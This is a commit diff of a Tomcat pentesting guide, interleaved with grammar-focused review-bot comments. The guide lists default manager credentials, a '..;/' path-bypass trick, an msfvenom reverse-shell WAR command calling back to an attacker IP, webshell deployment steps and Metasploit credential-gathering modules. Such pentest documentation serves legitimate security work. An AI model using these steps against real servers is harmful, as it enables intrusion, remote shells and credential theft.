GitBook: [#2914] No subject

This commit is contained in:
CPol 2021-12-23 18:13:55 +00:00 committed by gitbook-bot
parent a02d06638b
commit cf2bd3062d
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF


@ -16,11 +16,11 @@ msf> use auxiliary/scanner/http/tomcat_enum
## Default credentials
The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** \(execute code\). But this path is protected by basic HTTP auth, the most common credentials are:
The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** (execute code). But this path is protected by basic HTTP auth, the most common credentials are:
* admin:admin
* tomcat:tomcat
* admin:<NOTHING>
* admin:\<NOTHING>
* admin:s3cr3t
* tomcat:s3cr3t
* admin:tomcat
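Review bot: the `\<NOTHING>` escape on the `admin:` entry presumably stops GitBook from swallowing the angle brackets as an HTML tag, but the placeholder is still easy to misread next to the other literal pairs; rendering every pair in backticks and writing that entry as `admin:` followed by "(empty password)" would be clearer and keeps the list uniform. While this line is being touched, "the most common credentials are:" would be more accurate as "the default credentials commonly left in place are:", which also makes the defensive point (change them at install time) explicit.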
@ -49,12 +49,12 @@ A well-known vulnerability _to_ access the application manager \_\_ is mod\_jk i
In order to access to the management web of the Tomcat go to: _pathTomcat/%252E%252E/manager/html_
Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.
Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.\
To access to backdoor you might also need to use the double urlencode trick.
### /examples
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting \(XSS\) injection \(from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)\).
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection (from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)).
* /examples/jsp/num/numguess.jsp
* /examples/jsp/dates/date.jsp
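Review bot: "SSRF token" on the "Take into account…" line is almost certainly a typo for "CSRF token" (SSRF is server-side request forgery, not a token type) and should be fixed in the same edit that adds the trailing `\` hard line break. Two grammar fixes on the surrounding lines: "In order to access to the management web" reads better as "To access the management web interface", and "To access to backdoor" as "To access the backdoor". Further down, "The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used…" is a sentence fragment; dropping "that" fixes it.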
@ -79,13 +79,21 @@ The following example scripts that come with Apache Tomcat v4.x - v7.x and can b
* /examples/servlet/SessionExample
* /tomcat-docs/appdev/sample/web/hello.jsp
### Path Traversal (..;/)
In some **vulnerable versions of Tomcat** you can access to protected directories in Tomcat using the path: `/..;/`
So, for example, you might be able to **access the Tomcat manager** page accessing: `www.vulnerable.com/lalala/..;/manager/html`
**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
## RCE
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file \(execute code\)**.
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
### Limitations
You will only be able to deploy a WAR if you have **enough privileges** \(roles: **admin**, **manager** and **manager-script**\). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` \(it vary between versions\) \(see [POST ](tomcat.md#post)section\).
You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](tomcat.md#post)section).
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
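Review bot: the link `(see [POST ](tomcat.md#post)section)` has the space inside the link text, so the anchor text ends in a space and the following word runs into it; move the space outside: `(see [POST](tomcat.md#post) section)`. Same line: "can be find" should be "can be found" and "it vary between versions" should be "it varies between versions (and between distributions)". On the "Path Traversal" lines, "access to protected directories" should be "access protected directories", and "accessing:" before the URL reads better as "by requesting:".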
@ -114,11 +122,11 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
```
Then, upload the revshell.war file and access to it \(_/revshell/_\)
Then, upload the revshell.war file and access to it (_/revshell/_)
### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
In some scenarios this doesn't work \(for example old versions of sun\)
In some scenarios this doesn't work (for example old versions of sun)
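Review bot: "access to it" on the "Then, upload the revshell.war file" line should be "access it". The `msfvenom` line hardcodes `LHOST=10.11.0.41 LPORT=80` with no hint that these are placeholders; a short "(replace LHOST/LPORT with your own values)" after the block would save readers copying them verbatim. "old versions of sun" should be capitalised as "Sun" if it refers to the Sun JVM, and saying so explicitly would remove the ambiguity.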
#### Download
@ -178,7 +186,7 @@ $ jar -cvf ../webshell.war *
webshell.war is created
```
You could also install this \(allows upload, download and command execution\): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
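Review bot: "You could also install this (allows upload, download and command execution)" leaves "this" without a referent until the link at the end of the sentence; naming it up front, e.g. "You could also install the file browser JSP linked here (allows upload, download and command execution):", reads better, and since the link text is just the bare URL it could also be replaced with a descriptive label.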
## POST
@ -194,4 +202,3 @@ Other ways to gather Tomcat credentials:
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
```